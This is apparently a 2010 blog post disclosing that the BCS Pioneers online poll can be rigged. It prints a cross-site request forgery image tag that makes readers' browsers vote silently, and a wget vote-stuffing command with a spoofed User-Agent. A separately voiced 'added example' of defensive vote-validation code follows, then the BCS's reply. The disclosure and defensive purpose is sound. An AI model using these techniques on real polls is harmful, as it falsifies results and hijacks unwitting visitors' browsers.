Thursday, May 20, 2010

British Computer Society Pioneers vote is easily defrauded

Last night I was sitting looking at the BCS Pioneers page when I noticed that the voting for Hedy Lamarr was coming in thick and fast. As I refreshed the page I could see that many, many votes were coming in for her. I hopped over to Twitter to see if there was an organized vote happening and there was nothing obvious.

That got me wondering just how hackable the vote is. It turns out that the BCS has done almost nothing to prevent vote fraud. The only protection is a cookie set in your browser. Turn off cookies and you can vote as often as you want. Even more interesting is that it's possible to completely automate vote fraud: the BCS doesn't insist on a POST (a plain GET casts a vote), doesn't appear to be rate limiting IP addresses, doesn't require the cookie to be set before a vote is accepted, isn't checking the Referer header, and so on. In fact, the only thing it is sensitive to is the User-Agent string, which needs to look like a real browser is being used, and that is a header the client chooses.

For example, it would be trivial to make you vote for Alan Turing. Because a vote is accepted on a plain GET and nothing ties the request to the person making it, the vote URL can simply be dropped into an image tag: any page that embeds it makes the browser of everyone viewing that page send the vote request. Here's the code to do that (I modified this very slightly so that it won't actually work). I could embed that 'image' in this page and everyone reading this would be voting for Alan Turing in the background.
<img src="http://pioneers.bcs.org/?ctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24ctl04=ctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24Poll_11%24UpdatePanelPoll%7Cctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24Poll_11%24ctl01%241&__EVENTTARGET=ctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24Poll_11%24ctl01%241&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUENTM4MQ9kFgJmD2QWAmYPZBYCZg9kFgJmD2QWAgILEGRkFgICCw9kFgJmD2QWAmYPZBYCZg9kFgYCAQ8WBB4EVGV4dAUgV2hvIGlzIHlvdXIgaW5mb3JtYXRpb24gcGlvbmVlcj8eB1Zpc2libGVoZAIFDw8WAh8BZ2QWAmYPZBYCAgEPEA8WAh4MQXV0b1Bvc3RCYWNrZ2RkFgBkAgcPZBYCAgEPFgIfAGVkZOsMaV4hR4JP4KkEQ37Qx2vlbLoZ&ctl00%24ctl00%24ctl00%24ContentPlaceHolderDefault%24Poll_11%24ctl01=&__ASYNCPOST=true">

In fact, that makes the vote security for this poll a total joke. Using a simple script containing the following I bumped up Alan Turing's percentage of the vote by a few tenths of a percent as a test. If I'd left the script running I could have had him beating Hedy Lamarr within minutes.
wget --user-agent='Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5;en-US; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9' -S http://pioneers.bcs.org/?cat post -O vote -d

So, what should the BCS have done? They could have used Flash cookies to set a much more persistent cookie, although anything stored on the client, Flash cookies included, is just as easy for a script to discard as an ordinary cookie, so that only raises the bar for casual repeat voting. The checks that actually bite are server-side: accept a vote only on a POST that carries an unguessable per-session token (which also kills the embedded-image trick, since an image tag can only issue a GET), rate limit votes per IP address, force users to register and confirm an email address to vote, or ask users to fill in a CAPTCHA to vote. As it is, the current voting scheme is so open to fraud that the results are likely to be meaningless.
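As an added example (this is not the BCS site's code, which the post does not show), here is a small vote-validation layer in Python that models the weak scheme described above next to a hardened one: POST only, a per-session anti-CSRF token, one vote per session, and a sliding-window rate limit per IP. The Request class, the IP address 203.0.113.5, and the candidate names are constructed stand-ins so the whole thing runs offline.

```python
"""Added example (not the BCS site's code): a vote-validation layer modelling
the weak scheme the post describes next to a hardened one. Requests, IPs and
names are constructed stand-ins; nothing touches the network."""
import secrets
import time
from dataclasses import dataclass, field


@dataclass
class Request:
    # Constructed stand-in for an HTTP request; only the fields the checks use.
    method: str
    ip: str
    cookies: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


class WeakPoll:
    """As described in the post: any method accepted and a cookie, set only
    after voting, is the sole guard. A client that never stores it votes again."""
    def __init__(self):
        self.votes = {}

    def vote(self, req, candidate):
        if req.cookies.get("voted"):
            return False
        self.votes[candidate] = self.votes.get(candidate, 0) + 1
        req.cookies["voted"] = "1"  # attacker-controlled client: trivially dropped
        return True


class HardenedPoll:
    """POST only, per-session anti-CSRF token, one vote per session, sliding-window
    rate limit per IP. User-Agent and Referer are ignored: the client chooses both."""
    def __init__(self, max_per_ip=3, window_s=60):
        self.votes = {}
        self.sessions = {}        # session id -> expected CSRF token
        self.voted_sessions = set()
        self.ip_hits = {}         # ip -> timestamps of recent POST attempts
        self.max_per_ip, self.window_s = max_per_ip, window_s

    def new_session(self):
        """Session id goes in a cookie, the unguessable token in the vote form;
        a forged request needs both, and an image tag can supply neither."""
        sid, token = secrets.token_urlsafe(16), secrets.token_urlsafe(32)
        self.sessions[sid] = token
        return sid, token

    def _rate_limited(self, ip):
        now = time.monotonic()
        recent = [t for t in self.ip_hits.get(ip, []) if now - t < self.window_s]
        self.ip_hits[ip] = recent
        if len(recent) >= self.max_per_ip:
            return True
        recent.append(now)
        return False

    def vote(self, req, candidate):
        """Return 'ok' or the reason the vote was refused."""
        if req.method != "POST":
            return "reject: GET"          # an <img src> can only issue a GET
        if self._rate_limited(req.ip):
            return "reject: rate limit"   # counted even when the token is bad
        sid, token = req.cookies.get("session"), req.form.get("csrf")
        expected = self.sessions.get(sid)
        if not (sid and token and expected) or \
                not secrets.compare_digest(token.encode(), expected.encode()):
            return "reject: bad csrf token"
        if sid in self.voted_sessions:
            return "reject: already voted"
        self.voted_sessions.add(sid)
        self.votes[candidate] = self.votes.get(candidate, 0) + 1
        return "ok"


def stuff_weak_poll(n):
    """Attacker loop against WeakPoll: n GETs from one IP, cookie never kept."""
    poll = WeakPoll()
    for _ in range(n):
        poll.vote(Request("GET", "203.0.113.5"), "Alan Turing")
    return poll.votes.get("Alan Turing", 0)


def stuff_hardened_poll(extra_sessions):
    """Same attacker against HardenedPoll; returns (Turing's votes, outcomes)."""
    poll, ip, outcomes = HardenedPoll(max_per_ip=3, window_s=60), "203.0.113.5", []
    # 1. the embedded-image trick: a bare GET carrying no token
    outcomes.append(poll.vote(Request("GET", ip), "Alan Turing"))
    # 2. a POST with a guessed token and no session cookie
    outcomes.append(poll.vote(Request("POST", ip, form={"csrf": "guess"}), "Alan Turing"))
    # 3. a genuine vote: session cookie plus its matching token
    sid, tok = poll.new_session()
    genuine = Request("POST", ip, cookies={"session": sid}, form={"csrf": tok})
    outcomes.append(poll.vote(genuine, "Alan Turing"))
    # 4. replaying that request, which is all the wget loop amounts to
    outcomes.append(poll.vote(genuine, "Alan Turing"))
    # 5. minting fresh sessions from the same IP runs into the rate limit
    for _ in range(extra_sessions):
        sid, tok = poll.new_session()
        outcomes.append(poll.vote(Request("POST", ip, cookies={"session": sid},
                                          form={"csrf": tok}), "Alan Turing"))
    return poll.votes.get("Alan Turing", 0), outcomes
```

Calling stuff_weak_poll(50) yields 50 votes for Turing from one client that simply never stores the cookie; stuff_hardened_poll(5) yields a single vote, with the GET, the guessed token, the replay and the burst of fresh sessions each refused for a different reason. The rate limit is per IP, so an attacker with a pool of addresses still gets max_per_ip votes per address per window; that is why the post's other suggestions (confirmed registration, a CAPTCHA) are worth adding on top rather than instead.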

PS I emailed this blog post to the BCS and they replied:

Thanks very much for your email and blog post. We will be responding officially with a post on our blog shortly, but I just wanted to let you know that we have raised this issue with our site designer, and are looking at ways to change the voting system to keep it easy for people to vote and interact while preserving the vote's integrity.


If you enjoyed this blog post, you might enjoy my travel book for people interested in science and technology: The Geek Atlas. Signed copies of The Geek Atlas are available.
